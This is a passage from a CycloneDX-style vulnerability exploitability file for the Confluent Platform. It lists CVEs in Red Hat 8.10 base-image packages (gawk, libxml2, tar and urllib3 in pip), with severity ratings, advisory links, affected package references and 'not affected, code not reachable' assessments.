          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-4156",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-4156"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-4156"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215930"
        },
        {
          "url": "https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00000.html"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4156"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6373-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-4156"
        }
      ],
      "published": "2023-09-25T18:15:11+00:00",
      "updated": "2026-06-17T06:37:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45322",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is \"I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45322"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/10/06/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45322"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/344"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/583"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45322"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
        }
      ],
      "published": "2023-10-06T22:15:11+00:00",
      "updated": "2026-06-17T06:28:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45803",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45803"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:11238"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45803"
        },
        {
          "url": "https://bugzilla.redhat.com/2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/2257028"
        },
        {
          "url": "https://bugzilla.redhat.com/2257854"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246840"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45803"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2132.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:11238"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-45803.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2988.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7762-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
        }
      ],
      "published": "2023-10-17T20:15:10+00:00",
      "updated": "2026-06-17T06:29:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
